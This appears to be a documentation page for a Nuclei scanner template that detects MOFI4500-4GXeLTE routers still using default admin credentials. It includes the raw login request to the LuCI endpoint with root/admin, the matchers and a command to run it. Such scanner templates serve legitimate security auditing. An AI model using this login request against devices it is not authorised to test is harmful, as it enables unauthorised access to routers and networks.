Skip to content

MOFI4500-4GXeLTE-V2 Default Login

ID: mofi4500-default-login

Severity: high

Author: pikpikcu

Tags: mofi,default-login

Mofi Network MOFI4500-4GXELTE wireless router default admin credentials were discovered.

id: mofi4500-default-login
info:
name: MOFI4500-4GXeLTE-V2 Default Login
author: pikpikcu
severity: high
description: Mofi Network MOFI4500-4GXELTE wireless router default admin credentials were discovered.
reference:
- https://www.cleancss.com/router-default/Mofi_Network/MOFI4500-4GXELTE
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
tags: mofi,default-login
http:
- raw:
- |
POST /cgi-bin/luci/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=root&password=admin
attack: pitchfork
payloads:
username:
- root
password:
- admin
matchers-condition: and
matchers:
- type: word
words:
- "MOFI4500 - General - LuCI"
- type: status
status:
- 200
# digest: 4a0a0047304502203838a68e005b11bb5462278d8f3ecba8aa103de67be67defff670490fbac0313022100b499b062e40ec0d16d515fbafb5f41a3d5f82d983a79b08897f070c6e138c4f0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/mofi/mofi4500-default-login.yaml"

View on Github